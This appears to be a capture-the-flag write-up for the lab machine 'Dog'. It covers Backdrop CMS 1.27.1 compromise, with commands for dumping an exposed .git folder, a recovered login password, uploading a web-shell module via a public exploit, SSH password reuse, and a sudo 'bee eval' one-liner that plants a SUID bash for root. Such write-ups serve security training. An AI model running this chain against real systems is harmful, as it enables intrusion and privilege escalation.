Week 9. Dog

SUMMARY

This is an Ubuntu 20.04 machine serving a web site built by a vulnerable version of Backdrop CMS 1.27.1. Credentials to log into the CMS dashboard are found in a .git folder that can be downloaded with a Git dumper. Once inside the Backdrop management site, we upload a module that enables a web shell and enumerate system users. One of them allows SSH login using the previously disclosed credentials.

Regarding escalation, we abuse sudo configuration on bee binary, a command line utility that developers use interact with Backdrop sites.

KEYWORDS

Backdrop CMS 1.27.1, Git dumper, sudo escalation.

ENUMERATION

Port scan.

> for ports in $(nmap $target -p- --min-rate=5000 -Pn --open --reason | grep open | awk -F "/" '{print $1}' | tr '\n' ',' | sed s/,$//); do nmap $target -p$ports -sV -sC -Pn -vv -n && echo "\nList of open ports: $ports";done

Starting Nmap 7.93 ( https://nmap.org ) at 2025-03-11 18:58 GMT
Nmap scan report for 10.10.11.58
Host is up, received user-set (0.14s latency).
Scanned at 2025-03-11 18:58:46 GMT for 17s
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 972ad22c898ad3ed4dac00d21e8749a7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEJsqBRTZaxqvLcuvWuqOclXU1uxwUJv98W1TfLTgTYqIBzWAqQR7Y6fXBOUS6FQ9xctARWGM3w3AeDw+MW0j+iH83gc9J4mTFTBP8bXMgRqS2MtoeNgKWozPoy6wQjuRSUammW772o8rsU2lFPq3fJCoPgiC7dR4qmrWvgp5TV8GuExl7WugH6/cTGrjoqezALwRlKsDgmAl6TkAaWbCC1rQ244m58ymadXaAx5I5NuvCxbVtw32/eEuyqu+bnW8V2SdTTtLCNOe1Tq0XJz3mG9rw8oFH+Mqr142h81jKzyPO/YrbqZi2GvOGF+PNxMg+4kWLQ559we+7mLIT7ms0esal5O6GqIVPax0K21+GblcyRBCCNkawzQCObo5rdvtELh0CPRkBkbOPo4CfXwd/DxMnijXzhR/lCLlb2bqYUMDxkfeMnmk8HRF+hbVQefbRC/+vWf61o2l0IFEr1IJo3BDtJy5m2IcWCeFX3ufk5Fme8LTzAsk6G9hROXnBZg8=
|   256 277c3ceb0f26e962590f0fb138c9ae2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM/NEdzq1MMEw7EsZsxWuDa+kSb+OmiGvYnPofRWZOOMhFgsGIWfg8KS4KiEUB2IjTtRovlVVot709BrZnCvU8Y=
|   256 9388474c69af7216094cba771e3b3beb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPMpkoATGAIWQVbEl67rFecNZySrzt944Y/hWAyq4dPc
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 22 disallowed entries 
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
| /user/password /user/login /user/logout /?q=admin /?q=comment/reply 
| /?q=filter/tips /?q=node/add /?q=search /?q=user/password 
|_/?q=user/register /?q=user/login /?q=user/logout
|_http-title: Home | Dog
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 17.41 seconds

List of open ports: 22,80

Browse the site with Firefox, a web site about obesity in dogs comes into view.

In Nmap output we see there is a .git folder, you can download the repository it with a remote git dumper.

In the source code we find a user name in the file settings.php, and a password in the file update.settings.json

These can be used to login in the web site as tiffany:BackDropJ2024DS2024

After some enumeration, we find out this is Backdrop CMS 1.27.1.

This is vulnerable to authenticated RCE.

USER

The aforementioned exploit generates a malicious ZIP file that can be uploaded as a Backdrop CMS module. Just need to indicate the target URL when running the exploit.

> python3 exploit.py http://10.10.11.58

It has to be manually uploaded in http://dog.htb/?q=admin/installer/manual

But the application only allows modules with .tar.gz extension, so first we have to unzip the shell file and then compress again as .tar.gz

> unzip shell.zip
Archive:  shell.zip
replace shell/shell.info? [y]es, [n]o, [A]ll, [N]one, [r]ename: a
 extracting: shell/shell.info
 extracting: shell/shell.php
 
> ls
exploit.py  git-dumper  git_dumper.py  githack.py  shell  shell.zip
 
> tar -czf shell.tar.gz shell/

After uploading the malicious module in .tar.gz format, a web shell is available in https://dog.htb/modules/shell/shell.php?cmd

We already have a password, let's see if it has been reused in any of the system users.

First we enumerate the system users.

And try if SSH works for any of them. It works for johncusack

Under this shell, user flag can be retrieved.

ROOT

Start from the low-priv shell and take the opportunity to enumerate the user and the system.

> whoami && id
johncusack
uid=1001(johncusack) gid=1001(johncusack) groups=1001(johncusack)
 
> uname -a && cat /etc/os-release
Linux dog 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal

Enumerate sudo settings.

> sudo -l
[sudo] password for johncusack:
Sorry, try again.
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

Let's see what this stuff is about.

> sudo /usr/local/bin/bee --help
🐝 Bee
Usage: bee [global-options] <command> [options] [arguments]
 
Global Options:
 --root
 Specify the root directory of the Backdrop installation to use. If not set, will try to find the Backdrop installation automatically based on the current directory.
 
 --site
 Specify the directory name or URL of the Backdrop site to use (as defined in 'sites.php'). If not set, will try to find the Backdrop site automatically based on the current directory.
 
 --base-url
 Specify the base URL of the Backdrop site, such as https://example.com. May be useful with commands that output URLs to pages on the site.
 
 --yes, -y
 Answer 'yes' to questions without prompting.
 
 --debug, -d
 Enables 'debug' mode, in which 'debug' and 'log' type messages will be displayed (in addition to all other messages).
 
 
Commands:
 CONFIGURATION
  config-export
   cex, bcex
   Export config from the site.
 
  config-get
   cget
   Get the value of a specific config option, or view all the config options in a given file.
 
  config-import
   cim, bcim
   Import config into the site.
 
  config-set
   cset
   Set the value of an option in a config file.
 
 CORE
  download-core
   dl-core
   Download Backdrop core.
 
  install
   si, site-install
   Install Backdrop and setup a new site.
 
 DATABASE
  db-drop
   sql-drop
   Drop the current database and recreate an empty database with the same details. This could be used prior to import if the target database has more tables than the source database.
 
  db-export
   dbex, db-dump, sql-export, sql-dump
   Export the database as a compressed SQL file. This uses the --no-tablespaces option by default.
 
  db-import
   dbim, sql-import
   Import an SQL file into the current database.
 
 INFORMATION
  help
   Provide help and examples for 'bee' and its commands.
 
  log
   ws, dblog, watchdog-show
   Show database log messages.
 
  status
   st, info, core-status
   Provides an overview of the current Backdrop installation/site.
 
  version
   Display the current version of Bee.
 
 MISCELLANEOUS
  cache-clear
   cc
   Clear a specific cache, or all Backdrop caches.
 
  cron
   Run cron.
 
  maintenance-mode
   mm
   Enable or disable maintenance mode for Backdrop.
 
 PROJECTS
  disable
   dis, pm-disable
   Disable one or more projects (modules, themes, layouts).
 
  download
   dl, pm-download
   Download Backdrop contrib projects.
 
  enable
   en, pm-enable
   Enable one or more projects (modules, themes, layouts).
 
  projects
   pml, pmi, project, pm-list, pm-info
   Display information about available projects (modules, themes, layouts).
 
  uninstall
   pmu, pm-uninstall
   Uninstall one or more modules.
 
 ROLES
  permissions
   pls, permissions-list
   List all permissons of the modules.
 
  role-add-perm
   rap
   Grant specified permission(s) to a role.
 
  role-create
   rcrt
   Add a role.
 
  role-delete
   rdel
   Delete a role.
 
  role-remove-perm
   rrp
   Remove specified permission(s) from a role.
 
  roles
   rls, roles-list
   List all roles with the permissions.
 
 STATE
  state-get
   sg, sget
   Get the value of a Backdrop state.
 
  state-set
   ss, sset
   Set the value of an existing Backdrop state.
 
 THEMES
  theme-admin
   admin-theme
   Set the admin theme.
 
  theme-default
   default-theme
   Set the default theme.
 
 UPDATE
  update-db
   updb, updbst, updatedb, updatedb-status
   Show, and optionally apply, all pending database updates.
 
 USERS
  user-add-role
   urole, urol
   Add role to user.
 
  user-block
   ublk
   Block a user.
 
  user-cancel
   ucan
   Cancel/remove a user.
 
  user-create
   ucrt
   Create a user account with the specified name.
 
  user-login
   uli
   Display a login link for a given user.
 
  user-password
   upw, upwd
   Reset the login password for a given user.
 
  user-remove-role
   urrole, urrol
   Remove a role from a user.
 
  user-unblock
   uublk
   Unblock a user.
 
  users
   uls, user-list
   List all user accounts.
 
 ADVANCED
  db-query
   dbq
   Execute a query using db_query().
 
  eval
   ev, php-eval
   Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.
 
  php-script
   scr
   Execute an arbitrary PHP file after bootstrapping Backdrop.
 
  sql
   sqlc, sql-cli, db-cli
   Open an SQL command-line interface using Backdrop's database credentials.

The most interesting is the -ev flag, which seems to be used to evaluate PHP statements. If has to be done after bootstrapping a Backdrop, this is done by indicating the Backdrop installation directory.

Use your favorite payload for the PHP expression to evaluate.

> sudo /usr/local/bin/bee --root=/var/www/html ev "shell_exec('cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash');"

The only thing that's left is to spawn a root shell.

> /var/tmp/bash -p

You are root.

REFERENCES

https://github.com/arthaud/git-dumper

https://www.exploit-db.com/exploits/52021